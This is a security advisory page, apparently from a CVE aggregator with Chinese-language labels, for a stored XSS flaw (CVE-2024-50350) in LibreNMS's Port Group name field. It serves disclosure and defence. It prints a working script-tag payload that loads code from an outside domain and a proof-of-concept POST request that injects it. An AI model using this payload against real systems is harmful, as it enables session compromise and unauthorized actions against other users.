CVE-2024-50350

HIGH7.5EPSS 0.94%

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php

發布日:2024/11/15修改日:2024/11/15
也稱為:GHSA-xh4g-c9p6-5jxg

描述

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the "Port Settings" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions. ### Details When creating a new "Port Group," an attacker can inject the following XSS payload into the "name" parameter: ```<script/src=//15.rs></script>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The payload triggers when the affected Port Group is added to a device and the "Port Settings" page is reloaded. The vulnerability is due to insufficient sanitization of the "name" parameter. The sink responsible for this issue is: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69 ### PoC 1. Create a new Port Group using the following payload in the "name" parameter: ```name<script/src=//15.rs></script>``` 2. Add the Port Group to a device's port settings. 3. Reload the "Port Settings" page. 4. Observe that the injected script executes. Example Request: ```http POST /port-groups HTTP/1.1 Host: <your_host> Content-Type: application/x-www-form-urlencoded Cookie: <your_cookie> _token=<your_token>&name=name<script/src=//15.rs></script>&desc=descr<script/src=//15.rs></script> ``` ### Impact This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Port Settings" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1HIGH7.5CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

參考連結(4)